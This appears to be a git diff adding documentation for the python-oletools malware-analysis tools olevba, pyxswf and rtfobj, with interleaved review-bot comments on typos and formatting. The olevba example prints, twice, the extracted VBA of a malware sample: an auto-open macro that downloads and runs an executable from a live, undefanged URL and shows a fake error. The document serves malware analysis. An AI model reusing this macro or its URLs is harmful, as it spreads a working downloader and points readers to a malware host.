+    lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
+    Application.DisplayAlerts = False
+    Application.Quit
+End Function
+Sub Workbook_Open()
+    Auto_Open
+End Sub
+

How to use olevba in Python applications

+

TODO

+
+

python-oletools documentation
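Review bot: the example reproduces the sample's download URLs verbatim (OGEXYR "http://germanya.com.ec/logs/test.exe", ... and lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", ...) in a page where URLs render as clickable links; defang them (hxxp://, or break the domain) in both olevba.html and olevba.md so a reader cannot click through to a malware host. Separately, the Supported formats list has Word 97-2003 and Excel 97-2003 entries but no PowerPoint 97-2003 (.ppt) beside "PowerPoint 2007+ (.pptm, .ppsm)"; if .ppt is intentionally unsupported, say so rather than leaving readers to infer it.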

+ + + diff --git a/oletools/doc/olevba.md b/oletools/doc/olevba.md new file mode 100644 index 0000000..823e461 --- /dev/null +++ b/oletools/doc/olevba.md 
@@ -0,0 +1,90 @@ +olevba +====== + +olevba is a script to parse OLE and OpenXML files such as MS Office documents +(e.g. Word, Excel), to extract VBA Macro code in clear text. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +Supported formats: + +- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm) +- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb) +- PowerPoint 2007+ (.pptm, .ppsm) + +olevba is based on source code from [officeparser](https://github.com/unixfreak0037/officeparser) by John William Davison + +## Usage + + :::text + olevba.py + +### Example + +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/): + + :::text + >olevba.py DIAN_caso-5415.doc + + INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc + + ------------------------------------------------------------------------------- + ThisDocument.cls + + Attribute VB_Name = "ThisDocument" + Attribute VB_Base = "1Normal.ThisDocument" + Attribute VB_GlobalNameSpace = False + Attribute VB_Creatable = False + Attribute VB_PredeclaredId = True + Attribute VB_Exposed = True + Attribute VB_TemplateDerived = True + Attribute VB_Customizable = True + Option Explicit + Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _ + ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _ + ByVal HQTLDG As Long) As Long + Sub AutoOpen() + Auto_Open + End Sub + Sub Auto_Open() + SNVJYQ + End Sub + Public Sub SNVJYQ() + OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe" + End Sub + Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean + Dim HRKUYU, lala As Long + HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0) + If HRKUYU = 0 Then OGEXYR = True + Dim YKPZZS + YKPZZS = Shell(PHHWIV, 1) + MsgBox "El contenido de este documento no es compatible con este equipo." 
& vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible" + lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0) + Application.DisplayAlerts = False + Application.Quit + End Function + Sub Workbook_Open() + Auto_Open + End Sub + +## How to use olevba in Python applications + +TODO + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/pyxswf.html b/oletools/doc/pyxswf.html new file mode 100644 index 0000000..41ed4b3 --- /dev/null +++ b/oletools/doc/pyxswf.html @@ -0,0 +1,78 @@ + + + + + + + + + +
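Review bot: the worked example in the olevba.md hunk reproduces the sample's live download URLs verbatim (`http://germanya.com.ec/logs/test.exe` and `.../counter.php`) inside the VBA listing; defang them (e.g. `hxxp://`) or add a one-line warning that they belong to a malware sample and must not be fetched, because the rendered page and any copy of the VBA otherwise hand readers a ready-to-click link to a downloader that the macro immediately runs via `Shell`. Two smaller points in the same hunk: the Usage block reads only `olevba.py`, while the example invokes `olevba.py DIAN_caso-5415.doc`, so the file argument the script expects is missing from the synopsis; and the "How to use olevba in Python applications" section is committed as `TODO`, so either add the import and call sequence or leave the heading out until it is written.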

pyxswf

+

pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.

+

It is part of the python-oletools package.

+

pyxswf is an extension to xxxswf.py published by Alexander Hanel.

+

Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/

+

It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).

+

For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.

+

Usage

+
Usage: pyxswf.py [options] <file.bad>
+
+Options:
+  -o, --ole             Parse an OLE file (e.g. Word, Excel) to look for SWF
+                        in each stream
+  -f, --rtf             Parse an RTF file to look for SWF in each embedded
+                        object
+  -x, --extract         Extracts the embedded SWF(s), names it MD5HASH.swf &
+                        saves it in the working dir. No addition args needed
+  -h, --help            show this help message and exit
+  -y, --yara            Scans the SWF(s) with yara. If the SWF(s) is
+                        compressed it will be deflated. No addition args
+                        needed
+  -s, --md5scan         Scans the SWF(s) for MD5 signatures. Please see func
+                        checkMD5 to define hashes. No addition args needed
+  -H, --header          Displays the SWFs file header. No addition args needed
+  -d, --decompress      Deflates compressed SWFS(s)
+  -r PATH, --recdir=PATH
+                        Will recursively scan a directory for files that
+                        contain SWFs. Must provide path in quotes
+  -c, --compress        Compresses the SWF using Zlib
+

Example 1 - detecting and extracting a SWF file from a Word document on Windows:

+
C:\oletools>pyxswf.py -o word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+        [ADDR] SWF 1 at 0x8  - FWS Header
+
+C:\oletools>pyxswf.py -xo word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+        [ADDR] SWF 1 at 0x8  - FWS Header
+                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+

Example 2 - detecting and extracting a SWF file from a RTF document on Windows:

+
C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+RTF embedded object size 1498557 at index 000036DD
+[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
+00036DD
+        [ADDR] SWF 1 at 0xc40  - FWS Header
+                [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+

How to use pyxswf in Python applications

+

TODO

+
+

python-oletools documentation

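Review bot: in the second example of the pyxswf.html hunk the stream name is wrapped across two lines (`RTF_embedded_object_0` / `00036DD`) inside the preformatted block, so the rendered page shows a broken identifier; join it to `RTF_embedded_object_000036DD`, which is consistent with the `index 000036DD` printed on the line just above. In the same hunk, the Usage line's `<file.bad>` placeholder reads as if the input must already be known to be malicious; since `-o` and `-f` accept any Office or RTF document, `<file>` would be clearer.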
+ + + diff --git a/oletools/doc/pyxswf.md b/oletools/doc/pyxswf.md new file mode 100644 index 0000000..8f2e331 --- /dev/null +++ b/oletools/doc/pyxswf.md 
@@ -0,0 +1,92 @@ +pyxswf +====== + +pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may +be embedded in files such as MS Office documents (e.g. Word, Excel), +which is especially useful for malware analysis. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +pyxswf is an extension to [xxxswf.py](http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html) published by Alexander Hanel. + +Compared to xxxswf, it can extract streams from MS Office documents by parsing +their OLE structure properly, which is necessary when streams are fragmented. +Stream fragmentation is a known obfuscation technique, as explained on +[http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/](http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/) + +It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option). + +For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files. + +## Usage + + :::text + Usage: pyxswf.py [options] + + Options: + -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF + in each stream + -f, --rtf Parse an RTF file to look for SWF in each embedded + object + -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf & + saves it in the working dir. No addition args needed + -h, --help show this help message and exit + -y, --yara Scans the SWF(s) with yara. If the SWF(s) is + compressed it will be deflated. No addition args + needed + -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func + checkMD5 to define hashes. No addition args needed + -H, --header Displays the SWFs file header. No addition args needed + -d, --decompress Deflates compressed SWFS(s) + -r PATH, --recdir=PATH + Will recursively scan a directory for files that + contain SWFs. 
Must provide path in quotes + -c, --compress Compresses the SWF using Zlib + +### Example 1 - detecting and extracting a SWF file from a Word document on Windows: + + :::text + C:\oletools>pyxswf.py -o word_flash.doc + OLE stream: 'Contents' + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents + [ADDR] SWF 1 at 0x8 - FWS Header + + C:\oletools>pyxswf.py -xo word_flash.doc + OLE stream: 'Contents' + [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents + [ADDR] SWF 1 at 0x8 - FWS Header + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf + +### Example 2 - detecting and extracting a SWF file from a RTF document on Windows: + + :::text + C:\oletools>pyxswf.py -xf "rtf_flash.rtf" + RTF embedded object size 1498557 at index 000036DD + [SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0 + 00036DD + [ADDR] SWF 1 at 0xc40 - FWS Header + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf + + + +## How to use pyxswf in Python applications + +TODO + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/rtfobj.html b/oletools/doc/rtfobj.html new file mode 100644 index 0000000..03c3c74 --- /dev/null +++ b/oletools/doc/rtfobj.html @@ -0,0 +1,42 @@ + + + + + + + + + +
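Review bot: the option help pasted into pyxswf.md repeats "No addition args needed" for `-x`, `-y`, `-s` and `-H` (should be "additional") and "SWFS(s)" for `-d`; since this block mirrors the script's own `--help` output, fix the strings in pyxswf.py and paste the regenerated help rather than editing the doc alone, otherwise the two will drift apart. The paragraph "For this, simply add the -o option ... or the -f option to work on RTF files" also follows a sentence that has already introduced `-f`, so merging the two into one sentence that presents both switches would read better. Finally, both examples carve a SWF with the same MD5 (`2498e9c0701dc0e461ab4358f9102bc5`) from different containers; if the same test SWF was deliberately embedded in the .doc and the .rtf, say so, otherwise a reader may take the repeated hash for a copy-paste error.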

rtfobj

+

rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.

+

It is part of the python-oletools package.

+

Usage

+
rtfobj.py <file.rtf>
+

It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.

+

How to use rtfobj in Python applications

+

Usage as a python module:

+

rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.

+

Example:

+
import rtfobj    
+for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+    print 'found object size %d at index %08X' % (len(data), index)
+
+

python-oletools documentation

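Review bot: "OLE ojects" in the rtfobj.html intro is a typo for "OLE objects"; it is carried over from the .md source, so fix it there and regenerate the HTML rather than patching the rendered file only. The "Usage as a python module:" line ends in a colon but is followed by a paragraph rather than the code it announces; either drop the colon or move the sentence directly above the example.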
+ + + diff --git a/oletools/doc/rtfobj.md b/oletools/doc/rtfobj.md new file mode 100644 index 0000000..4e002ea --- /dev/null +++ b/oletools/doc/rtfobj.md @@ -0,0 +1,47 @@ +rtfobj +====== + +rtfobj is a Python module to extract embedded objects from RTF files, such as +OLE ojects. It can be used as a Python library or a command-line tool. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +## Usage + + :::text + rtfobj.py + +It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file. + + + +## How to use rtfobj in Python applications + +Usage as a python module: + +rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object. + +Example: + + :::python + import rtfobj + for index, data in rtfobj.rtf_iter_objects("myfile.rtf"): + print 'found object size %d at index %08X' % (len(data), index) + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file
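Review bot: the rtfobj.md hunk says the tool extracts "all the data blocks encoded as hexadecimal", while its heading and first sentence promise OLE objects; in RTF, pictures (`\pict`) and other binary payloads are hex-encoded too, so state that every hex-encoded block is dumped and that each `object_xxxx.bin` should be inspected (e.g. with oleid or olevba from this package) before it is treated as an OLE object. It would also help to say that `xxxx` is the hexadecimal offset of the block in the RTF file, which is what the `%08X` in the API example prints, so readers can match the CLI file names to the `index` yielded by `rtf_iter_objects()`.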